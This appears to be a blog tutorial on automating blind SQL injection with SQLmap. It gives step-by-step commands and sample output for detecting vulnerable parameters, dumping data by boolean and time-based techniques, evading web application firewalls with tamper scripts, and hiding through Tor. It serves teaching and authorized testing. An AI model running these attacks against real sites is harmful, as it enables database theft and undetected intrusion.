Blind SQL injection occurs when an attacker receives no direct feedback from a web application about the result of SQL queries. Since the web server doesn’t display errors or query results explicitly, attackers rely on indirect methods like timing or boolean conditions to extract information. SQLmap automates blind SQL injection attacks, making the process faster and easier by sending multiple requests and interpreting the server’s behavior.
In this article, you’ll learn how to perform blind SQL injection using SQLmap, automate data extraction with boolean- and time-based methods, and bypass common security filters such as Web Application Firewalls (WAFs).
Table of Contents
Prerequisites
- SQLmap installed:
Install SQLmap in Termux - A test target: Ensure you have permission to perform security testing.
- Proxy tool (e.g., Burp Suite): Useful for analyzing web requests.
How to Automate Blind SQL Injection with SQLmap
Step 1: Detecting Blind SQL Injection Vulnerabilities
Start by scanning the target to see if a parameter is vulnerable to SQL injection.
Command:
sqlmap -u "http://target.com/page?id=1"Sample Output:
[22:10:30] [INFO] testing if GET parameter 'id' is dynamic
[22:10:32] [WARNING] no error-based injection found
[22:10:35] [INFO] testing for blind SQL injection...
[22:10:40] [INFO] GET parameter 'id' appears to be vulnerable to blind SQL injection Explanation:
SQLmap identifies that the id parameter is vulnerable to blind SQL injection, even though there are no visible error messages or query results.
Step 2: Automating Boolean-Based Blind SQL Injection
SQLmap uses boolean conditions to determine if a query returns true or false.
Command:
sqlmap -u "http://target.com/page?id=1" --technique=B --dumpSample Output:
[22:15:45] [INFO] performing boolean-based blind SQL injection
[22:15:50] [INFO] retrieved: user1
[22:15:55] [INFO] retrieved: user2
+-------+
| users |
+-------+
| user1 |
| user2 |
+-------+Explanation:
Using boolean-based blind SQL injection, SQLmap retrieves data by sending conditional queries and observing changes in the web server’s response.
Step 3: Automating Time-Based Blind SQL Injection
When the server’s responses don’t vary, SQLmap can infer query results by introducing time delays.
Command:
sqlmap -u "http://target.com/page?id=1" --technique=T --dumpSample Output:
[22:20:10] [INFO] testing for time-based blind SQL injection
[22:20:15] [INFO] GET parameter 'id' is vulnerable
[22:20:20] [INFO] retrieved: admin
[22:20:30] [INFO] retrieved: password123
+----------+------------+
| username | password |
+----------+------------+
| admin | password123|
+----------+------------+Explanation:
In time-based blind SQL injection, SQLmap sends queries that cause delays if certain conditions are true. This technique helps extract data even without visible feedback from the server.
Step 4: Bypassing WAF with SQLmap
Web Application Firewalls (WAFs) can block injection attempts. SQLmap’s tamper scripts help bypass these filters.
Command:
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment --technique=B --dumpSample Output:
[22:25:10] [INFO] using tamper script 'space2comment' to evade WAF
[22:25:15] [INFO] performing boolean-based blind SQL injection
[22:25:20] [INFO] retrieved: guest
[22:25:30] [INFO] retrieved: guest123
+--------+---------+
| user | password|
+--------+---------+
| guest | guest123|
+--------+---------+Explanation:
Using the space2comment tamper script modifies SQL queries to bypass the WAF, allowing SQLmap to perform blind SQL injection attacks successfully.
Step 5: Extracting Specific Data
SQLmap allows you to extract specific data from the database, such as table names or user credentials.
Command:
sqlmap -u "http://target.com/page?id=1" --columns -D target_db -T usersSample Output:
[22:30:12] [INFO] retrieved column: id
[22:30:15] [INFO] retrieved column: username
[22:30:18] [INFO] retrieved column: password Explanation:
This command targets a specific table to extract columns, making the process more efficient during a blind SQL injection attack.
Step 6: Using Proxy and Tor for Anonymity
To prevent detection, you can route SQLmap requests through a proxy or Tor network.
Command:
sqlmap -u "http://target.com/page?id=1" --tor --tor-type=SOCKS5 --check-torSample Output:
[22:35:05] [INFO] Tor connection confirmed
[22:35:10] [INFO] performing blind SQL injection anonymously Explanation:
Routing through Tor helps you maintain anonymity during a blind SQL injection attack.
Conclusion
Blind SQL injection can be challenging without visible errors or responses, but SQLmap makes the process efficient by automating boolean-based and time-based injections. Using tamper scripts for WAF bypass and routing traffic through proxies ensures smoother, more secure testing.
Always remember to perform these actions only on systems you have explicit permission to test. Unauthorized use is illegal and can result in severe consequences.
Disclaimer
This article is intended for educational purposes only. Always seek proper authorization before performing any form of penetration testing.
